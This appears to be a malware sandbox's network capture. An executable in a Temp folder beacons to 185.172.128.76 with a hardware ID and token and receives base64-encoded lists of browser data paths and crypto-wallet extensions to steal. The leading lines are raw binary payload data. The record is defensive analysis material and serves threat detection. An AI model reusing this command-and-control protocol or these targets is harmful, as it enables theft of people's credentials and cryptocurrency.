$;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 25, 2024 09:04:00.345675945 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 25, 2024 09:04:00.345688105 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 25, 2024 09:04:00.345772982 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 25, 2024 09:04:00.345786095 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 25, 2024 09:04:00.345797062 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 25, 2024 09:04:00.345851898 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 25, 2024 09:04:00.345890045 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 25, 2024 09:04:00.345917940 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 25, 2024 09:04:00.345931053 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 25, 2024 09:04:00.588290930 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	185.172.128.76	80	1720	C:\Users\user\AppData\Local\Temp\u42w.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:01.482470989 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--
Apr 25, 2024 09:04:01.973778963 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4d 57 4d 79 4e 54 63 35 4d 6a 41 7a 4e 6d 55 34 4e 6a 68 68 4d 7a 67 7a 4e 32 46 69 4d 32 51 77 5a 54 55 34 4d 44 67 79 4f 44 51 79 59 54 67 33 4f 57 59 30 59 7a 59 78 59 54 59 7a 4f 57 4d 78 5a 57 4d 31 5a 6d 52 6d 4e 44 45 33 4f 47 5a 68 4e 6a 51 34 5a 47 59 33 4f 54 63 31 4e 44 6b 32 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: MWMyNTc5MjAzNmU4NjhhMzgzN2FiM2QwZTU4MDgyODQyYTg3OWY0YzYxYTYzOWMxZWM1ZmRmNDE3OGZhNjQ4ZGY3OTc1NDk2fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 25, 2024 09:04:01.975179911 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDA Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
Apr 25, 2024 09:04:02.298523903 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
Apr 25, 2024 09:04:02.298546076 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 25, 2024 09:04:02.300152063 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"plugins------GIJJKKJJDAAAAAKFHJJD--
Apr 25, 2024 09:04:02.619925976 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
